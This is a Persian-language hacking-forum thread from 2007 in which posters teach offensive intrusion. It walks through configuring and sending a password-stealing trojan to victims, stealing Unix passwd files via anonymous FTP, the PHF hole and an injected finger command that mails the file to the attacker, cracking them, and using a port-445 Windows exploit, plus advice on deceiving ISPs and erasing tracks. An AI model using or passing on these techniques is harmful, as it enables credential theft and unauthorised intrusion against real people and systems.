منظورش مشخصه.ميگه اول مثل پر کردن مشخصات پسورد و آيدی خودمون رو تو برنامه وارد ميکنيم و بعد ایمل کسی رو که ميخوايم هک کنيم رو وارد ميکنيم. اگر پا به پای آموزش ها پيش بری ميشکلی پيش نمياد.البته انتظار نداشته باش که همچی به طور کامل توضيح داده بشه
m_mahdi313
31-05-2007, 10:49
با سلام
مطالبتون رو خوندم موفق باشيد
mazi_z_PSP
01-06-2007, 09:38
می خوام شمارو با تروجن B-S و طرز کار این تروجن اشنا کنم ،این تروجن توسط دوستم بیژن نوشته شده که اولین تروجن ایرانی مخصوص گرفتن پسورد یک ID در یاهو مسنجر، این تروجن ورژین های مختلفی داره که جدیدترین نسخه اون 1.9.1 هست ،این تروجن دارای چند قسمت هستش که در مورد هر کدام براتون توضیح میدم ، در ضمن این تروجن تا 1 ماه پیش Undected بود یعنی طوری که آنتی ویروس ها سرورهای اونو نمی شناختن ولی فعلا آنتی ویروس های آپدیت شده و بروز درامده اونو تشخیص میدن و بعنوان B-S Password Sender به کاربر اخطار میدن .
این تروجن دارای 3 سرور هست که هر کدام وظیفه خاصی دارن ، اطلاعاتی در مورد سرورهای این تروجن :
msn-Server :این سرور مخصوص هک کردن یک آیدی در msn مسنجر که 44 kb حجم داره .
net-Server : این فایل نیز یکی دیگه از سرورهای این تروجن محسوب میشه و برای گرفتن شماره کاربر و پسورد اشتراک اون یا Ras Password بکار میره و 44 kbنیز حجم داره ،البته این ورژین B-S کلا برای سیستمهای ویندوز 95-98-mellinium نوشت شده و بخوبی رو این نوع از ویندوزها کار می کنه .
: yahoo-Server بجرأت میتونم بگم که B-S رو همه بخاطر این سرور میشناسن و بخاطر این سرور بود که این تروجن در بین تمام ایرانی ها محبوب شد ،این سرور مخصوص هک کردن و بدست آوردن پسورد یک ID در یاهو مسنجر و در نتیجه هک کردن ایمیل یاهو قربانی .این سرور نیز 44kb حجم داره و طریقه حذف کردن فایلهای این سرورو در انتهای ورد کامل توضیح میدم .
B-S edit Server : خب این اطلاعاتی که در بالا دادم در مورد سرورهای این تروجن بود ولی برای این که این سرورهارا برای طرفی که میخواین هکش کنین بفرستین قبلش احتیاج به تنظیم کردن اونها دارین ،این کارو میتونین با edit Server انجام بدین ، بدین صورت که در ابتدا فایل B-S edit Server را باز می کنید ، سپس در قسمت mail setting در قسمت Your E-mail ایمیل خودتونو میدین که اینجا سعی کنید ایمیلی از Hotmail بدین چون این تروجن با هات میل بخوبی کار میکنه و بهتر شما نیز هات میل بدین .خب بعد از دادن ایمیلتون باید Smtp مورد نظرو بدین چون Smtp هات میل چند وقت پیش عوض شد ، تیک داخل مربع Auto Smtp غیر فعال کنین تا خودتون بتونین Smtp جدید هات میلو بدین ، برای این کار در قسمت Smtp Server فعال شده بنویسین : mx01.hotmail.com که این یکی از Smtp های جدید هات میل که این تروجن و اغلب تروجن های دیگه مثل Optix-Barok , ... با این Smtp براحتی کار می کنن
و در انتها در قسمت Fake Message Setting شما میتونین تعیین کنین که وقتی سرور توسط قربانی اجرا و باز میشه آیا Eror بهش داده بشه یا نه که این گزینه دیگه به خودتون بستگی داره اگه مایل بودین که سرور هنگام اجرا شدن Eror بده تیک گزینه enable fake eror message فعال کنین و Eror را انتخاب کنین . خب در مرحله آخر باید سروری که میخواین این تنظیمات در اون ذخیره شه انتخاب کنین برای این کار گزینه Update Server بزنین و یکی از سرورهارو که در خود پوشه تروجن هست انتخاب و Save بزنین تا سرور با مشخصات شما ذخیره شه و این کارهارا برای هر 3 سرور B-S انجام بدین و اونارو تنظیم کنید .
خب شاید شما تعجب کنین که این تروجن چرا client نداره ، چون این تروجن اصلاً احتیاجی به کلاینت برای وصل شدن به سیستم قربانی نداره و تنها کاری که شما برای هک کردن طرف و بدست آوردن پسوردهای اون دارین فرستادن یکی از سرورها برای قربانی و باز کردن آن توسط اون طرف و با این کار بستگی به نوع سرور فرستاده شده پسورد اون براتون ایمیل میشه . خب این توضیحاتی که در بالا دادم ، نحوه چگونگی تنظیم کردن سرورها و نحوه کار با این تروجن بود ولی حالا می خوام کمی درباره چگونگی پاک کردن و حذف کردن فایلهای سرور اجرا شده بروی سیستم خودتون توضیح بدم تا اگه سیستمتون آلوده به این تروجن شد بتونین اونو از این تروجن پاک کنید ، من طریقه پاک کردن سرور یاهو B-S از تو رجیستری توضیح میدم چون این سرور در این تروجن کاربرد بیشتری داره .
طریقه پاک کردن سرور یاهو B-S از سیستم :این سرور بعد از اجرا شدن در قسمت های مختلف سیستم قرار می گیره و در رجیستری میشینه ، وقتی سرور یاهو اجرا میشه یک کپی از خودشو در قسمت windows و در پوشه System قرار میده و با اسم YUpdater.exe و با آیکون یاهو مسنجر در سیستم میشینه ، همان طور که میدونید فایل Yupdater.exe یکی از فایل های اجرایی خود یاهو مسنجر که در پوشه خود یاهو مسنجر و برای آپدیت شدن و بروز در آمدن نسخه باهو مسنجر بکار میره و این فایل سرور یاهو B-S هم بهمین نام ایجاد میشه فقط تنها فرقش اینه که این سرور در پوشه windows/system میشین ولی فایل اجرایی خود یاهو در پوشه خود یاهو مسنجر و شما با این راه میتونین فایل سرور یاهو B-S با فایل خود مسنجر تشخیص بدین و فایل سرورو پاک کنید ، ولی قبل از این کار باید شما فایلهای سرور ایجاد شده در رجیستری و Startup پاک کنین تا بتونین فایل سرور یاهو B-S که YUpdater.exe هست را از پوشه سیستم پاک کنید پس برای این کارهایی که میگم را انجام بدین :
در ابتدا دکمه Start در پایین صفحه ویندوزتون را زده و به قسمت RUN برین و در آنجا تایپ کنید : msconfig و بعد به Startup برید و در آنجا دنبال اسم : YUpdater.exe __________ Sys بگردین که این فایل سرور یاهو B-S هست و خود Sys بمعنی سیستم هست و اگه این فایلرو در startup مشاهده کردین بدونین که سیستمتون به این تروجن آلوده شده و برای اینکه اونو از رو سیستم حذف کنین باید تیک کنار Sys در startup غیر فعال کنین البته در صورتی که کنار Sys نوشته باشه YUpdater.exe" " بعد از غیر فعال کردن فایل سرور در startup دوباره به RUN برید و این بار دستور Regedit تایپ کنین تا به رجیستری سیستمتون برین و بعد این مراحل را طی کنید :
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\ ===>Sys-YUpdater.exe
و در این قسمت اگه سیستم شما به این تروجن و سرور یاهو این تروجن آلوده باشه شما فایل YUpdater.exe را قطعاً در این قسمت خواهید دید و بعد این فایل را در صورت مشاهده پاک کنید ، ولی این تروجن در چند جای رجیستری می شینه و شما بجزآدرس بالا باید به 2 جای دیگه سر بزنید :
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cur rentVersion\Run\ ===>Sys-YUpdater.exe
و همچنین در این قسمت :
HKEY_USERS\.DEFAULT\Software\Microsoft\internet explorer\exploler bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}
\FilesNameMRU
و در صورت مشاهده فایل YUpdater.exe در قسمت هایی که گفته شد آنهارا پاک کنید و در آخر به windows/system برین و این فایل را در آنجا نیز پاک کنید و بعد از Restart مطمئن باشید که سیستمتان از وجود این تروجن پاک شده است .
خب دوستان این مطالب را بیشتر بخاطر این گفتم که اگر خواستین این تروجن را روی سیستم خودتون تست کنین تا ببینید بهتون ایمیل میاد یا نه ، بعد بتونید تروجنو از روی سیستمتون پاک کنید . البته اگر از یک فایروال شخصی مثل Zone Alarm استفاده کنید وقتی سرور یاهو این تروجن اجرا بشه بهتون Alert داده میشه که فایل YUpdater.exe قصد داره به نت وصل شه و اگه شما قبول کنید و بعد از آن با یک ID دیگه در مسنجر Login کنید آن وقت اگه سرور این تروجن در سیستمتون اجرا شده باشه و شما سرور را با هات میل خودتون تنظیم کرده باشین بعد از 2-3 دقیقه براتون ایمیل میاد که این فقط به عنوان تست و شما میتونین برای هر کسی از طریقه ایمیل و یا مسنجرها سرور تنظیم شده این تروجنو بفرستین و کاری کنین که طرف گول بخوره و سرور را باز کنه .
mazi_z_PSP
01-06-2007, 09:40
چند روزي بود فكر استفاده از يك كارت اينترنت مجاني داشت ديوونم ميكرد... البته بگم ها ما حروم خور هم نيستيم ... آخه بابا به پير به پيغمبر نامرديه كه ما اين همه پول كارت هاي آبكي اينترنت رو ميديم ... يكمي هم كيف دنيا رو كنيم ..... اينه
Unixيكي از سرورهايي است كه در جهان بسيار از آن استفاده مي شود در ايران و دربيشتر شهر هاي بزرگ هم ISPهايي وجود دارند كه سرور آن ها Unixباشند .بنابر اين شما مي توانيد براي هك آن ها از اين راه ها استفاده كنيد شما در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي نفوذ گر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شما يك فايل Passwdرا باز كنيد چنين نوشته هايي را
مي بينيد .كه بايد آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
Taha:3A62i9qr:1012:10:Mashhad
در اينجا مثلا Tahaنام IDو 3a62...كلمه عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكن مي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh admin:*:100:11:WWW administrator:/home/Common/[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh ما فعلا مي خواهيم اين فايل را دريافت كنيم .اولين قدم اين است كه آيدي در آن ISPبراي خود دست و پا كنيم .حالا اين آيدي مي تواند متعلق به دوستمان باشد و يا يك آشناي دور .پيدا كردن رمز دوست شما به سادگي ميسر است كه در حوصله اين مقاله نمي گنجد .بعد از پيدا كردن رمز شما با آيدي دوستتان به شبكه Connectشويد .اين اتصال مي تواند يك اتصال به طريق Modem DialUpConnectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشويد و فرمان زير را وارد كنيد
FTP [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])/
كه Domainآدرس سرور ISPمي باشد سپس از شما خواسته مي شود تا آيدي خود را وارد كنيد كلمه ي Anonymousرا بزنيد .سپس وقتي درخواست كلمه عبور شد كليد Enterرا بزنيد .اگر وارد سيستم شديد موفق شده ايد در غير اين صورت جمله ي login failedدريافت مي شود .دوباره امتحان كنيد و اين بار در كادر Passwordآدرس Emailاي را وارد كنيد .اگر اين بار هم جواب نداد به جاي كلمه ي anonymousاز Userخود يعني دوستتان استفاده كنيد . احتمال دارد اين بار هم موفق نشويد .اين دفعه روش هاي فوق را براي دستور زير امتحان كنيد
FTP ftp.domain.com
اگر اين بار هم جوابي نگرفتيد با ISPتماس گرفته و سوال كنيد كه چگونه مي توانم از سرور FTPخود شما استفاده كنم چون وارد سيتمتان نمي شود اگر پرسيد براي چه مي خواهيد وارد شويد بگوييد مي خواهم از نرم افزار هاي آن استفاده كنم ولي مواظب باشيد كه نام خود را نگوييد .خلاصه تمام تلاش خود را براي فهميدن روش دستيابي به سيستم بكنيد اگر توانستيد وارد سيستم شويد به راحتي مي توانيد وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيريد ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا ياد داشته باشيد .براي لسيت دستورات مي توانيد ?را تايپ كنيد .ابتدا به شاخه ي ETCبرويد مي توانيد فايل passwdرا در آنجا پيدا كنيد .اين فايل را بگيريد .اگر در آنجا نبود شاخه هاي ديگر را امتحان كنيد .ولي به احتمال زياد همانجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كنيد .
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام دهيد .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كنيد .
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
اگر اين آدرس كار نكند ديگر هيچ اميدي نيست اما اگر كار كند كادري جلوي شما ظاهر مي شود كه مي خواهد نام مورد نظر خود را بدهيد .آدرس زير را وارد كنيد .
ID@domain.com ; /bin/mail you@somewhere.com (you@somewhere.com) < etc/passwd
كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است .
bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com (amir6_6_6@yahoo.com) < etc/passwd
با وارد كردن اين دستور فايل Passwdبراي من به آدرس 3dhack@yahoo.com پست مي شود !
خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش شويد .
حالا اگر فايل shadowedگير آورديد بقيه ي متن را نخوانيد چون كمكي به شما نمي كند و بايد از روش هاي ديگري استفاده كرد .اما اگر يك فايل مثل نمونه اولي كه در بالا بود گير آورديد مي توانيد كار خود را ادامه دهيد حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها JohnRipperو Cracker Jackمي باشد .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])به دست بياوريد اما نمونه ي ديگري از اين نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از اين برنامه ها مي توانيد به هدف خود برسيد . به همين راحتي .....
mazi_z_PSP
01-06-2007, 09:46
IP
شماره ايست که به هر کامپيوتر متصل به اينترنت داده میشود تا بتوان بهکمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايتها) و نيز کامپيوترهای کلاينتی که معمولا به روشی غير از شمارهگيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل میشويد، عددی جديد به شما نسبت داده میشود.
اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی بهصورت زير نوشته میشود:
xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شمارهها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسمهايی مثل [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که برای اتصال استفاده میکنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد.
در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح میدهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول میگيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار میتواند مفيد باشد.
بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا میگم)
v Port
در ساده ترين تعريف، محلی است که دادهها وارد با خارج میشوند. در مبحث هک معمولا با پورتهای نرمافزاری سروکار داريم که به هر کدام عددی نسبت میدهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورتها کار خاصی را نسبت میدهند و بقيه بهصورت پيشفرض برای استفاده شما هستند. پورتهای که فعال هستند، هرکدام توسط يک نرمافزار خاص مديريت میشوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرمافزار اين کار انجام شود و اين نرمافزار بر روی پورت ۲۵ منتظر (فالگوش) میماند. اينجا ممکن است شخصی از فلان نرمافزار و ديگری از بهمان نرمافزار استفاده کند ولی بههر حال پورت ۲۵ هميشه برای ارسال Email است.
در پايين ليستی از مهمترين پورتها و کاربردشان را میبينيد:
Port Num Service Why it's phun!
-------- ------- ----------------------------------------
7 echo Host repearts what you type
9 discard Dev/null
11 systat Lots of info on users
13 daytime Time and date at computer's location
15 netstat Tremendous info on networks
19 chargen Pours out a stream of ASCII characters.
21 ftp Transfers files
23 telnet Where you log in.
25 smpt Forge email
37 time Time
39 rlp Resource location
43 whois Info on hosts and networks
53 domain Nameserver
70 gopher Out-of-date info hunter
79 finger Lots of info on users
80 http Web server
110 pop Incoming email
119 nntp Usenet news groups -- forge posts, cancels
443 shttp Another web server
512 biff Mail notification
513 rlogin Remote login who Remote who and uptime
514 shell Remote command, no password used! syslog Remote system logging
520 route Routing information protocol
از ميان اين پورتها شمارههای ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهمترند و بهتدريج با آنها آشنا خواهيد شد.
mazi_z_PSP
01-06-2007, 09:47
- Hacker کيست ؟
هکر کسی است که با سيستم های کامپيوتری آشناست و میتواند با روشهايی خاص (بدون اجازه) وارد آنها شود... اين انسان میتواند خوب يا بد باشد ( در هر حال هکر است )
- سوال: يک هکر از چه راهی وارد يک سيستم میشود؟
از راه شبکه (نه بابا ! )
بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی bug (خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف میشوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرمافزارهايی را بهسرعت (در عرض چند ساعت ) ايجاد میکنند تا مشکل رفع شود اينها را patch میگويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چند سال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل میکنند. در اين فاصله هکرها دمار از روزگار اين سايتها در میاورند...
- تعريف چند اصطلاح:
*** Hacker واقعی = سامورايی :
کسی که هدفش از نفوذ به سيستمها نشان دادن ضعف سيستمهای کامپيوتری است نه سوءاستفاده ...
*** Wacker (واکر):
کسی که هدفش از نفوذ به سيستمها، استفاده از اطلاعات آن سيستمهاست (جرو هکرهای کلاه سياه )
*** Cracker (کراکر):
کسی که هدفش از نفوذ به سيستمها، خرابکاری و ايجاد اختلال در سيستمهای کامپيوتری است. (جرو هکرهای کلاه سياه )
*** Preaker :
از قديميترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراقسمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه (-;
v زنگ تفريح
- تقسيم بندی من برای هکر ها:
۱- جوجههکرها (احمق کوچولوها):
توانايیها: بلدند از Sub 7 , 187 استفاده کنند و فکر کنند ديگه همهچی رو ياد گرفتهاند !
۲- خروسهکرها يا مرغهکرها (احمقهای بزرگتر):
توانايیها: Mail Box را هم میتوانند Bomb کنند ... ماشاءالله !
۳- هکرهای قابلاحترام ( مثل خود شما):
دارند ياد میگيرند و هنوز ۲،۳ سال کار دارند.
۴- هکرهای پيشکسوت:
ديگه آفتاب لبه بومه ... هکرهای قابل احترام را دوس دارند
v تقسيمبندی
- انواع کامپيوترهای شبکه:
=> کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايتها را نگه میدارند.
=> کامپبوترهای Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار میکشيد.
- انواع سيستم عاملهايی که Server ها از آن استفاده میکنند:
=> سيستمهای فعلی:
* خانواده Unix (مثل FreeBSD, Linux, Sun Solaris )
* خانواده Windows (مثل WinNT, Win2000 )
* OsMac
=> سيستمهای قديمی (منقرض شده - آخيش ! ):
AIX, IRIS, DEC10, DEC20 , ...
- سوال: کدامها را بايد ياد گرفت؟
Win2000, Unix(Linux) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHat Linux را روی کامپيوتر خود همزمان داشته باشيد.
v برای شروع چه چيزی لازم است؟
۱- Win2000 , Linux را روی کامپيوتر خود نصب کرده و شروع به يادگيری کنيد.
۲- شروع به يادگيری زبان C کنيد.
۳- شروع به يادگيری TCP/IP کنيد. (يک کتاب بخريد )
۴- مهمترين چيز علاقه به طی کردن يک را بسييييييار طوووووولانی
v تقسيمبندی انواع حملات
Sub7 زياد هم بد نيست ولی نبايد زيادهروی کرد) علت هم اينه که هربار که به اينترنت وصل میشوند ip جديدی به آنها اختصاص پيدا میکنه و زحماتتون هدر میره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم).
حالا تقسيمبندی:
۱- حمله به روش Denial of Service Attack) DoS)
۲- حمله به روش Exploit
۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد)
۴- حمله به روش Disinformation
v 133t Speak چيست؟
گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگليسی معادلهای قراردادی به کار میروند که ليست آنها را در زير میبينيد:
0 <= O1 <= L; I2 <= Z3 <= E4 <= A5 <= S6 <= G7 <= T8 <= B| <= L; I@ <= at (duh)$ <= S)( <= H}{ <= H/\/ <= N\/\/ <= W/\/\ <= M|> <= P; D|< <= Kph <= fz <= s
مثلا he Speaks میشود:
}{3 $|>34|< z
توصيه من اينه که از اين معادلها تا جايی که میتونيد استفاده نکنيد. فقط ياد بگيريد که کم نياريد.
v ترسيم مسير برای آينده
۱- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که میخواهيد هک کنيد ( کلاينت يا سرور )، زيرا روشهک کردن ايندو بجز در مراحل ابتدايی کاملا متفاوت است.
۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه میدارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت میکنيد که مثالی برای کامپيوتر کلاينت است) و جمعآوری اطلاعات در مورد آن است. اين جمعآوری اطلاعات از قربانی (Victim) را Footprinting گويند. اولين مشخصهای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستمعامل و نيز برنامههايی است که کامپيوتر شخص از آنها بهره میبرد. يکی از مهمترين ( و گاه خطرناکترين) کارها، تستکردن پورتهای آن کامپيوتر برای ديدن اينکه کدام پورتها باز و کدامها بسته هستند.
۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی میدهد، حالتی است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را بهدست آورده و از طريق اين Shell Account به نهايت نفوذ دست يابيم ولی گاه بهدلايل مختلف (مربوط به سطح علمی خود و ... ) نمیتوان به اين سطح دستيافت اما به هر حال برای مرحله بعدی میتواند استفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان میرسد.
۴- اين مرحله بعد از نفوذ روی میدهد که در آن به يک سطحی از کنترل سيستم رسيدهايد. رفتار شما در اين مرحله مشخص میکند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشتهايد يا نه، همينجا مشخص خواهد شد.
۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضی از سيستمها آمار login را نگه میدارند که در مورد آنها اين مرحله بسيار مهم است.
mazi_z_PSP
01-06-2007, 09:48
دوستان اون کد هايی که وسطشون شکلک افتاده رو دوباره براتون ميفرستم تا بتونيد ازشون استفاده کنيد
mazi_z_PSP
01-06-2007, 11:01
آموزش هک ----
درس اول
کامپیوترهای Client :
کامپیوترهایی که از شبکه و اطلاعات استفاده می کنند
کامپیوترهای Server :
کامپیوترهایی که وظیفه تامین اطلاعات و سرویس دهی را در شبکه بر عهده دارند
IP :
هر کامپیوتر متصل به اینترنت صرفنظر از اینکه آیا این کامپیوتر سرور است یا کلاینت یک شماره مخصوص منحصر به فرد دارد تا بتوان به وسیله آن شماره به کامپیوتر دسترسی داشت که IP می گویند. این عدد برای کامپیوترهای سرور و کامپیوترهایی که به غیر از روش Dilaup به اینترنت متصل می شوند عددی است ثابت و برای کامپیوترهای کلاینتی که به صورت Dialup به اینترنت متصل می شوند متغیر است که این عدد را هر بار که به ISP متصل می شویم به صورت تصادفی در اختیار ما قرار می دهد.
IP یک عدد 32 بیتی (چهاربایتی) است که به صورت زیر نوشته می شود xxx.xxx.xxx.xxx که منظور از xxx عددی بین 0 تا 255 می باشد .
پورت Port :
Port محلی که داده ها وارد و یا خارج می شوند (درگاههای ورود و خروج) در مبحث مربوط به هک با پورت هایی سروکار داریم که به هر کدام یک عددی نسبت می دهیم که این اعداد بین 1 و 655351 می باشند. هرکدام از پورت های فعال توسط یک نرم افزار مدیریت می شوند مثلا پورت 25 مخصوص ارسال ایمیل می باشد.
در درسهای بعد لیست پورت ها و کاربردشان را شرح خواهیم داد.
mazi_z_PSP
01-06-2007, 11:04
آموزش هک ---- :
درس دوم
:133 Speak
استفاده از معادل های قراردادی به جای حروف انگلیسی که هکر ها گاهی هنگام نوشتن از آن استفاده
می کنند . لیست آنها را در زیر می بینید:
O
0
L ; I
1
Z
2
E
3
A
4
S
5
G
6
T
7
B
8
L ; I
|
at
@
S
$
H
)(
H
}{
N
/ \ /
W
\ / \ /
M
/ \ / \
P ; D
| >
K
| <
F
P H
S
Z
مثلا به جای he speaks می شود:
}{3 $|>34|<z
mazi_z_PSP
01-06-2007, 11:07
دوستان به علت يک سری مشکلات ادامه این آموزش ها بعدا گزاشته ميشه.الان اگر تونستم آموزش های ديگه ای براتون ميزارم
mazi_z_PSP
01-06-2007, 11:11
مطلبي كه در اينجا ميخوانيد يكمي پيچيده است بنابراين اصلا نگران نباشيد گام به گام با اين متن پيش برويد سعي ميكنم خيلي ساده عنوان كنم اصلا نگران نباشيد
خلاصه كاري كه ما ميكنيم اين است كه ما با كارهاي زير ميخواهيم به ويندوز 2000 يا ايكس پي حمله كنيم از بيرون دستگاه بدون اينكه به قرباني فايلي بديم اجرا كنه يا هر ارتباط ديگري با قرباني داشته باشيم يعني ميخوايم خيلي حرفه اي نه مثل اين هكر هاي تازه كار كه تروجان ميدن به مردم خيلي حرفه اي خودمان ميخوايم يك پورت روي دستگاه قرباني باز كنيم بدون اينكه حتي يك كلمه هم با قرباني حرف بزنيم خوب حالا كه فهميديد چيكار ميخوام بكنيم من يكبار ديگه هم خلاصه بگم يك اي پي انتخاب ميكنيد و بعد هكش ميكنيد اولين كاري كه ميكنيم اين است كه اي پي مورد نظر يا همان قرباني را براي باز بودن پورت 445 امتحان ميكنيم
Start->run->CMD
را براي باز كردن يك صفحه كامند پرومت بزنيد و بعد با دستور
telnet ip 445
امتحان ميكنيم كه ايا پورت 445 باز است يا نه البته شما اگر حرفه اي هستيد حتما مثل هكر هاي حرفه اي براي اين كارها يك برنامه خاص را استفاده ميكني بنا به سليقه خودتان كه از چه برنامه اي خوشتان مياد ولي در اينجا از دستوراتي استفاده ميكنيم كه هر كسي خواست اين كار را انجام بدهد نياز به برنامه خاصي نداشته باشه و با كمترين امكانات ميخوايم به نتيجه برسيم
خوب توجه كنيد به جا اي پي در دستور بالا بايد اي پي قرباني را وارد كنيد و اگر اين دستور را وارد كرديد و اتصال برقرار شد يعني پورت 445 باز است پس گام اول را برداشتيد و اگر اتصال برقرار نشد و پيغام خطا دريافت كرديد قرباني شما به اين نوع حمله نفوذ پذير نيست
خوب حالا به گام دوم ميرويم در زير كد هاي حمله به اين پورت را مشاهده ميكنيد اين كدها را بايد كامپايل بفرمائيد و فايل اجرايي كه بدست مي اوريد را بصورت زير استفاده ميكنيد
expl <target> <victim IP> <bindport> [options]
در خط بالا طرز استفاده به اين ترتيب است اولين كلمه expl نام فايل اجرايي است كه بعد از كامپايل ايجاد كرديد target يك عدد يك رقمي است كه مقدار 0 براي ويندوز ايكس پي است و مقدار 1و2 براي ويندوز 2000 است در اخر اين نوشته طرز تشخيص اينكه كدام عدد را استفاده كنيد يعني از كجا بفهميد قرباني ويندوز ايكس پي است كه 0 بزنيد يا قرباني ويندوز 2000 است كه 1 يا 2 بزنيد را ميخوانيد
victim ip همان اي پي قرباني شما است كه پورت 445 ان باز بود
binport شماره پورتي است كه ميخواهيد روي دستگاه قرباني براي شما باز بشود و به ان پورت وصل بشويد و قرباني را هك كنيد
option يك دستور است كه در ادامه تك دستور اين برنامه را توضيح ميدهم
خوب دوست من كار بسيار ساده است فرض كنيد اي پي قرباني من 217.0.0.1 است و من طبق ان چيزهايي كه بالا گفتم اين كارهاي را به تريتب انجام ميدهدم
1- Start --> Run --> CMD
